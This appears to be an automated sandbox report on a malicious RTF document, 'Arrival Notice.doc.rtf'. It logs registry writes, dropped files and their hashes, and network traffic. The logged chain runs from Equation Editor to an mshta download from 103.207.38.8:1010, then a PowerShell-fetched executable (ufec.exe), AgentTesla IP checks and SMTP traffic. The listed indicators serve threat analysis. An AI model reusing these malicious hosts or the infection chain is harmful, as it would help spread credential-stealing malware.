HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1330184242
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036 1330184241
2700 WINWORD.EXE write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage SpellingAndGrammarFiles_1036 1330184242
2700 WINWORD.EXE write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage SpellingAndGrammarFiles_1033 1330184270
2700 WINWORD.EXE write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage SpellingAndGrammarFiles_1033 1330184271
2700 WINWORD.EXE write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage SpellingAndGrammarFiles_3082 1330184243
2700 WINWORD.EXE write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage SpellingAndGrammarFiles_3082 1330184244
2700 WINWORD.EXE write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage SpellingAndGrammarFiles_1036 1330184243
2700 WINWORD.EXE write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage SpellingAndGrammarFiles_1036 1330184244
2700 WINWORD.EXE write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage SpellingAndGrammarFiles_1033 1330184272
2700 WINWORD.EXE write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage SpellingAndGrammarFiles_1033 1330184273
2700 WINWORD.EXE write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage SpellingAndGrammarFiles_1033 1330184274
2700 WINWORD.EXE write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage SpellingAndGrammarFiles_1033 1330184275
2700 WINWORD.EXE write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage SpellingAndGrammarFiles_1033 1330184276
2700 WINWORD.EXE write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage SpellingAndGrammarFiles_1033 1330184277
1640 EQNEDT32.EXE write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage EquationEditorFilesIntl_1033 1330184195
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\General Zoom 200
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\General CustomZoom 150
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\General ShowAll 0
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\General Version 3.1
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\General ForceOpen 0
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\General ToolbarDocked 1
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\General ToolbarShown 1
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\General ToolbarDockPos 1
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\General MTUpgradeDialog 4
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Sizes Full 12 pt
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Sizes Script 7 pt
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Sizes ScriptScript 5 pt
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Sizes Symbol 18 pt
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Sizes SubSymbol 12 pt
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing LineSpacing 150%
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing MatrixRowSpacing 150%
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing MatrixColSpacing 100%
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing SuperscriptHeight 45%
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing SubscriptDepth 25%
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing LimHeight 25%
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing LimDepth 100%
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing LimLineSpacing 100%
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing NumerHeight 35%
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing DenomDepth 100%
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing FractBarOver 1 pt
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing FractBarThick 0.5 pt
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing SubFractBarThick 0.25 pt
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing FenceOver 1 pt
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing SpacingFactor 100%
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing MinGap 8%
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing RadicalGap 2 pt
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing EmbellGap 1.5 pt
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing PrimeHeight 45%
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Fonts Text Times New Roman
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Fonts Function Times New Roman
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Fonts Variable Times New Roman,I
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Fonts LCGreek Symbol,I
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Fonts UCGreek Symbol
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Fonts Symbol Symbol
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Fonts Vector Times New Roman,B
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Fonts Number Times New Roman
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Fonts User1 Courier New TUR
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Fonts User2 Times New Roman
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Windows EquationWindow 120,213,600,1066
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Windows SpacingWindow 40,20,124,493
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Windows TextLanguage Any
1640 EQNEDT32.EXE write HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Windows MathLanguage Any
2840 MsHTa.exe write HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap UNCAsIntranet 0
2840 MsHTa.exe write HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap AutoDetect 1
2840 MsHTa.exe write HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings ProxyEnable 0
2840 MsHTa.exe write HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections SavedLegacySettings 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
2760 powershell.exe write HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E LanguageList en-US
2760 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 EnableFileTracing 0
2760 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 EnableConsoleTracing 0
2760 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 FileTracingMask 4294901760
2760 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 ConsoleTracingMask 4294901760
2760 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 MaxFileSize 1048576
2760 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 FileDirectory %windir%\tracing
2760 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS EnableFileTracing 0
2760 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS EnableConsoleTracing 0
2760 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS FileTracingMask 4294901760
2760 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS ConsoleTracingMask 4294901760
2760 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS MaxFileSize 1048576
2760 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS FileDirectory %windir%\tracing

Files activity

Executable files
4
Suspicious files
3
Text files
9
Unknown types
5

Dropped files

PID Process Filename Type MD5 SHA256
3084 ufec.exe C:\Users\admin\AppData\Roaming\local\MicrosoftVisualBasicVsa.dll executable MD5: 1da9b14bab582efaf3516f62224b32d7 SHA256: 8f1965758f46265104ee27a855ead8cf3b37a3408f55e4fcbc6221dd47229f0e
3084 ufec.exe C:\Users\admin\AppData\Local\Temp\nsh847E.tmp\BgImage.dll executable MD5: 487368e6fce9ab9c5ea053af0990c5ef SHA256: e27efa5dfde875bd6b826fafb4c7698db6b6e30e68715a1c03eb018e3170fc04
2760 powershell.exe C:\Users\Public\ufec.exe executable MD5: e10188401461c7781338834690b66346 SHA256: f6f35c3cbf83450d1fecb7101784e6cc89fa13b994ae16199087c2c5119984d3
3084 ufec.exe C:\Users\admin\AppData\Local\Temp\nsh847E.tmp\System.dll executable MD5: 0d7ad4f45dc6f5aa87f606d0331c6901 SHA256: 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
2700 WINWORD.EXE C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat text MD5: a1310138e1d01330d6bfebdfd7856e8a SHA256: 46594355c7cfcdfb9656003c6d9dd83e649f2b4cd5a04ee9b29910026445afd3
3084 ufec.exe C:\Users\admin\AppData\Roaming\local\co5531copytostr.cs text MD5: 30b6c29d44ebb9925aac936e49243d15 SHA256: de45eed0fdf5090d35182150730933828893cc2605b4094feef712e1d382a8e4
3084 ufec.exe C:\Users\admin\AppData\Roaming\local\Ethiopian-Goha16.psf.gz compressed MD5: aa2b3e550adcac3275da47411f9360d8 SHA256: c673863cdf4df310620c00d042872bd2140a749fc1c707fdbea1766b56ee6fd7
3084 ufec.exe C:\Users\admin\AppData\Roaming\local\co1815setposition.cs text MD5: 01a0edc1d1b162cf7ead38488b384571 SHA256: cde70decdf82f1bdcbd3cd215a56d120030f46bbf48ba2a7a71588d96b4a777a
3084 ufec.exe C:\Users\admin\AppData\Roaming\local\customctrlssdefig3.gif image MD5: 0a7ca394151431bc8162fe4fd1a3806e SHA256: 7c7fbe89267ffc5dd80f9a3af213d08cb8930bfe00ba9a0706d3f31617b50122
3084 ufec.exe C:\Users\admin\AppData\Roaming\local\ssmport3.hxc xml MD5: 87510e466a5eb296a60719d6805e860e SHA256: 1fa25d7d0220de4d14f5df3b9c14c6226f7e64044e51cecc9360217bb115788f
2700 WINWORD.EXE C:\Users\admin\AppData\Local\Temp\CVR63B6.tmp.cvr –– MD5: –– SHA256: ––
2700 WINWORD.EXE C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Arrival Notice.doc.rtf.LNK lnk MD5: 873085238ec31a974c6042bdbc61e353 SHA256: ead8c5c29a3990c83eacc1eff809059aee0390d8fc7e395353f7e2d192afa50f
3084 ufec.exe C:\Users\admin\AppData\Local\Temp\DsmlPagedSearch.csproj text MD5: 2dd384fe6ff35b8be044fb0f017d2fc2 SHA256: ac9532c4c74213fa1b67263761a18939dc1a7adcc218b129c2f0d91130899032
2700 WINWORD.EXE C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A35FEBEB.wmf wmf MD5: a53ff3b2b74b0493cd2dd5351bcb2760 SHA256: ac5f55a119b8894f347a6e85328d4a1e7ba350e0d4ea98ce1d3b2f95faecb5f2
2760 powershell.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF18726c.TMP binary MD5: a272b20d1454efe23a324e582f0e701d SHA256: 68aa16559f2894a02236a7716541c3fcf362333253818fdfe6fde31c94e95051
2760 powershell.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms binary MD5: a272b20d1454efe23a324e582f0e701d SHA256: 68aa16559f2894a02236a7716541c3fcf362333253818fdfe6fde31c94e95051
2760 powershell.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\01HMSYP47R6P5MFYB7EW.temp –– MD5: –– SHA256: ––
2840 MsHTa.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\hta[1] html MD5: b4e61a6248989a55e62a6911a7ca5629 SHA256: bb1ee67dab0fe73ee50e0b70ecf2a3ffefbbdde87717d84249d601e35f8a477b
2700 WINWORD.EXE C:\Users\admin\Desktop\~$rival Notice.doc.rtf pgc MD5: fbc987173319ffb1181f31529def32c4 SHA256: a07076d623b9c77753dd62f3a2fecb6cecfe956f9b142c3c04dd7751cc516279
2700 WINWORD.EXE C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm pgc MD5: bafb239a30f00a10d28d8b45ce2629e6 SHA256: ace28e8eee0d27becb0fa8ab9f1a5c91b5b9f3f80dfe5e714df8794ab39cb254
3084 ufec.exe C:\Users\admin\AppData\Roaming\local\407dobson1.jpg image MD5: 11aa4e35131e85c9b131eab1e7f9e805 SHA256: dadd0634e6d6eca1813ac7008ec1178b568366ea3eed698f78e04155fbfa4840

Find more information about the static content and download it at the full report

Network activity

HTTP(S) requests
3
TCP/UDP connections
4
DNS requests
2
Threats
8

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
2840 MsHTa.exe GET 200 103.207.38.8:1010 http://103.207.38.8:1010/hta VN html –– malicious
2760 powershell.exe GET 200 103.207.38.8:1010 http://103.207.38.8:1010/get VN text –– malicious
–– –– GET 200 34.196.181.158:80 http://checkip.amazonaws.com/ US text –– shared

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
2840 MsHTa.exe 103.207.38.8:1010 VNPT Corp VN malicious
2760 powershell.exe 103.207.38.8:1010 VNPT Corp VN malicious
–– –– 34.196.181.158:80 Amazon.com, Inc. US shared
–– –– 94.46.15.55:587 Almouroltec Servicos De Informatica E Internet Lda PT malicious

DNS requests

Domain IP Reputation
checkip.amazonaws.com 34.196.181.158, 18.205.71.63, 3.224.145.145, 18.214.132.216, 52.44.169.135, 52.55.255.113 shared
mail.casadavilas.com 94.46.15.55 malicious

Threats

PID Process Class Message
2840 MsHTa.exe Misc activity SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
2760 powershell.exe A Network Trojan was detected ET TROJAN Windows executable base64 encoded
2760 powershell.exe Misc activity SUSPICIOUS [PTsecurity] Executable base64 Payload
–– –– A Network Trojan was detected MALWARE [PTsecurity] AgentTesla IP Check

4 ETPRO signatures available at the full report

Debug output strings

No debug info.